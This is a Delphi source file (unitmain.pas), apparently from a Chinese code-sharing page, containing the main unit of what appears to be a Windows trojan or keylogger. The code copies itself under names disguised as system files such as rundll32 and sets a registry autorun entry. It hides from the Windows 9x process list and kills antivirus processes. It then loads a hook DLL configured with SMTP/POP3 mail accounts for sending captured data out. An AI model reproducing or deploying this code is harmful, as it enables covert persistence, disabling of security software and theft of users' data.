📄 unitmain.pas
字号:
unit UnitMain;
interface
uses
Windows, SysUtils2, reg, unithooktype, other;
type
TStartHook = procedure(data: pchar; BackDoor: pchar; VerTest: boolean); stdcall;
//0 html1xxxx
//1 163.com wed@163.com xxxx
//2 smtp.163.com wed@163.com pass xxxx
TStopHook = procedure; stdcall;
const
WM_CLOSE = $0010;
consthtml1 = //'00 http://www.great.com/sendmailold.asp?tomail=we@163.com&MailBody='#0+
'01 pop3.vip.sina.com wen@vip.sina.com '#0 +
'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' +
'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' +
'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' +
'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' +
'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' +
'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx';
procedure Main(door:string);
implementation
function GetCRC(consthtml1: string): integer;
{var
h:Thandle;
sizel,sizeh:dword;
i:integer;
p:pchar;
begin
result:=-1; //false
h:=fileopen(paramstr(0),GENERIC_READ);
if h=INVALID_HANDLE_VALUE then exit;
sizel:=getfilesize(h,@sizeh);
getmem(p,sizel);
readfile(h,p[0],sizel,sizeh,nil);
result:=0;
for i:=0 to sizel div 4 -1 do
begin
inc(result,pinteger(@p[i*4])^);
end;
freemem(p,sizel);
closehandle(h); }
var
i: integer;
begin
result := 0;
for i := 0 to length(consthtml1) div 4 - 1 do
inc(result, pinteger(@consthtml1[1 + i * 4])^);
end;
function WinExec2(ExeFile: string; ProcessInfo: PProcessInformation = nil): boolean;
var
sStartInfo: STARTUPINFO;
ProcInfo: TProcessInformation;
PProcInfo: PProcessInformation;
begin
ZeroMemory(@sStartInfo, sizeof(sStartInfo));
SStartInfo.cb := sizeof(sStartInfo);
if ProcessInfo = nil then PProcInfo := @ProcInfo
else PProcInfo := ProcessInfo;
result := CreateProcess(nil, Pchar(ExeFile), nil, nil, false, CREATE_DEFAULT_ERROR_MODE,
nil, nil, sStartInfo, PProcInfo^);
end;
function IsWindows9x: Boolean;
var
Osi: TOSVersionInfo;
begin
Osi.dwOSVersionInfoSize := sizeof(Osi);
GetVersionEx(Osi);
if (Osi.dwPlatformID = Ver_Platform_Win32_NT) then
result := False
else
result := True;
end;
function ApplicationClassIfExists(WndClass: string): Boolean;
var
hSem: THandle;
begin
Result := False;
hSem := CreateSemaphore(nil, 0, 1, pchar('Semaphore' + WndClass));
if ((hSem <> 0) and (GetLastError() = ERROR_ALREADY_EXISTS)) then
begin //如果已存在这个信号灯
Result := True;
end;
end;
function GetMyWindowsDirectory: string;
var
i: DWORD;
begin
i := MAX_PATH + 1;
setlength(result, i);
i := GetWindowsDirectory(@result[1], i);
setlength(result, i);
if result[i] <> '\' then result := result + '\';
end;
function GetMySystemDirectory: string;
var
i: DWORD;
begin
i := MAX_PATH + 1;
setlength(result, i);
i := GetSystemDirectory(@result[1], i);
setlength(result, i);
if result[i] <> '\' then result := result + '\';
end;
procedure ForceCopyFile(is9x: boolean; src, des: string);
var
sbak: string;
lpDirSrc, lpDirDes: array[0..MAX_PATH + 1] of Char;
begin
if not copyfile(pchar(src), pchar(des), false) then
begin
sbak := des + '.ddd';
if copyfile(pchar(src), pchar(sbak), false) then
begin
if is9x then
begin
GetShortPathName(pchar(sbak), lpDirSrc, MAX_PATH + 1);
GetShortPathName(pchar(des), lpDirDes, MAX_PATH + 1);
WritePrivateProfileString('rename', lpDirDes, lpDirSrc,
'wininit.ini');
end
else begin
//Killpro(extractfilename(des));
//sleep(1000);
//if not copyfile(pchar(src), pchar(des), false) then
//begin
MoveFileEx(pchar(sbak), pchar(des),
MOVEFILE_REPLACE_EXISTING or MOVEFILE_DELAY_UNTIL_REBOOT);
//end;
end;
end;
end;
end;
function mycopy(is9x: boolean; srcpath, desPath, Filename: string): boolean;
var
des, src: string;
buf: array[0..100] of char;
i, h, size: Dword;
fileNamePre:string;
begin
fileNamePre:=copy(filename,1,7);
des := desPath + Filename;
src := srcPath + Filename;
if not fileexists(src) then
begin
result := false;
exit;
end;
if not fileexists(des) then
copyfile(pchar(src), pchar(des), false);
i := $40;
while i <= $5A{Z} do
begin
if fileexists(src + '.txt') then
begin
h := fileopen(src + '.txt', fmopenread or fmShareDenyNone);
if h <> INVALID_HANDLE_VALUE then
begin
readfile(h, buf, sizeof(buf), size, nil);
if size <> 0 then
begin
buf[size] := #0;
if strcomp(@buf, sname) = 0 then
begin
closehandle(h);
break;
end;
end;
closehandle(h);
end;
inc(i);
src := srcPath + fileNamePre + chr(i) + '.exe';
end
else begin
h := filecreate(src + '.txt');
if h <> INVALID_HANDLE_VALUE then
begin
strcopy(@buf, sname);
filewrite(h, buf, strlen(sname));
closehandle(h);
end;
break;
end;
end;
Killpro(extractfilename(src));
sleep(1000);
ForceCopyFile(is9x, paramstr(0), src);
result:=true;
end;
procedure autorun1;
type
TRegisterServiceProcess = function(dwProcessID, dwType: Integer): Integer; stdcall;
var
fileRundll32Pre,fileInternatPre:string;
s, path, filename, filebak: string;
i: Integer;
h: THandle;
bInSpy, bInSpyRun, bInSpyInter: boolean;
RegisterServiceProcess: TRegisterServiceProcess;
path2,pathWin, pathSystem, pathProgram: string;
is9x: boolean;
begin
pathSystem := GetMySystemDirectory;
pathWin := GetMyWindowsDirectory;
pathProgram := copy(pathWin, 1, 3) + 'Program Files\';
filename := extractfilename(paramstr(0));
path := extractfilepath(paramstr(0));
fileRundll32Pre:=copy(fileRundll32,1,7);
fileInternatPre:=copy(fileInternat,1,7);
bInSpyRun := (ansicomparetext(copy(filename, 1, length(fileRundll32Pre)), fileRundll32Pre) = 0);
bInSpyInter := (ansicomparetext(copy(filename, 1, length(fileInternatPre)), fileInternatPre) = 0);
bInSpy := bInSpyRun or bInSpyInter;
is9x := IsWindows9x;
if is9x then
begin
h := LoadLibrary('KERNEL32.DLL');
RegisterServiceProcess := GetProcAddress(h, 'RegisterServiceProcess');
if @RegisterServiceProcess <> nil then RegisterServiceProcess(GetCurrentProcessID, 1);
FreeLibrary(h);
end;
if is9x and bInSpy then
begin
s := trim(GetCommandLine);
if copy(s, 1, 1) = '"' then
begin
delete(s, 1, 1);
i := pos('"', s);
delete(s, 1, i + 1);
end
else begin
i := pos(' ', s);
if i = 0 then s := ''
else delete(s, 1, i);
end;
if bInSpyRun then
begin
if ansicomparetext(filename,fileRundll32)=0 then i:=$41
else begin
filebak := uppercase(copy(filename, length(fileRundll32Pre) + 1, maxint));
i := pos('.', filebak);
if i <> 0 then
filebak := copy(filebak, 1, i - 1);
if(length(filebak)<>1)or(filebak[1]<'A')or(filebak[1]>'Z')then i:=$20
else i:=ord(filebak[1])+1;
if ansicomparetext(chr(i),copy(fileRundll32,7,1))=0 then inc(i);
end;
filebak := path + fileRundll32Pre + chr(i) + '.exe';
if fileexists(filebak) then
begin
filebak:='"' +filebak+ '" ' + s;
end
else begin
filebak:='"' + pathProgram + fileRundll32 + '" ' + s;
end;
WinExec2(filebak);
end
else //if bInSpyInter then
begin
if ansicomparetext(filename,fileInternat)=0 then i:=$41
else begin
filebak := uppercase(copy(filename, length(fileInternatPre) + 1, maxint));
i := pos('.', filebak);
if i <> 0 then
filebak := copy(filebak, 1, i - 1);
if(length(filebak)<>1)or(filebak[1]<'A')or(filebak[1]>'Z')then i:=$20
else i:=ord(filebak[1])+1;
if ansicomparetext(chr(i),copy(fileInternat,7,1))=0 then inc(i);
end;
filebak := path + fileInternatPre + chr(i) + '.exe';
if fileexists(filebak) then
begin
filebak:='"' +filebak+ '" ' + s;
end
else begin
filebak:='"' + pathProgram + fileInternat + '" ' + s;
end;
WinExec2(filebak);
end;
end;
//writedat('exe:2');
if not bInSpy then
begin
if is9x then
begin
mycopy(is9x, pathWin, pathProgram, fileRundll32); //如果目标文件已存在,则不拷贝
mycopy(is9x, pathSystem, pathProgram, fileInternat);
end
else begin
Killpro('KVXP.KXP');
Killpro('KVMonXP.KXP');
path2:=pathProgram;
copyfile(pchar(paramstr(0)), pchar(path2 + fileRundll32), false);
//AddValue2(HKEY_CLASSES_ROOT, 'exefile\shell\open\command', '', pchar('"'+pathProgram + fileRundll32+'" /c "%1" %*'));
//AddValue2(HKEY_CURRENT_USER, 'Software\Microsoft\Windows NT\CurrentVersion\Windows', 'load', pchar('"'+pathProgram + fileRundll32+'"'));
AddValue2(RootKey, Regpath1, RegValue, pchar(path2 + fileRundll32));
end;
end;
//writedat('exe:1');
if (ApplicationClassIfExists(ClassName)) then
begin
//showmessage('exists');
ExitProcess(0);
end;
end;
procedure Main(door:string);
var
StartHook: TStartHook;
StopHook: TStopHook;
msg: TMsg;
dllfile, s1: string;
Lib: THandle;
begin
autorun1;
killer;
s1 := consthtml1;
if (GetCRC(s1) <> 0) and (not FileExists(extractfilepath(paramstr(0)) + sname + '.dpr'))
then
begin
Messagebox(0, 'error', '', 0);
exit;
end;
dllfile := GetMySystemDirectory + file2;
if fileexists(dllfile) then
deletefile(pchar(dllfile));
ExtractRes('dll', 'dll1', dllfile);
Lib := LoadLibrary(file2);
if Lib = 0 then
Lib := LoadLibrary(pchar(dllfile));
if Lib = 0 then exit;
@StartHook := GetProcAddress(lib, 'StartHook');
@StopHook := GetProcAddress(lib, 'StopHook');
// Messagebox(0,pchar(s1),'',0);
// writedat(string(pchar(consthtml1))+':'+ string(pchar(consthtml2)),'c:\game.txt');
// exit;
StartHook(pchar(copy(s1, 2, maxint)), '', copy(s1, 1, 1) <> '0');
while true do
begin
if PeekMessage(Msg, hinstance, 0, 0, PM_REMOVE) then
begin
if (msg.message = WM_CLOSE {WM_QUIT}) then break;
TranslateMessage(msg);
DispatchMessage(msg);
end;
sleep(1000);
killer;
end;
StopHook;
end;
initialization
finalization
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -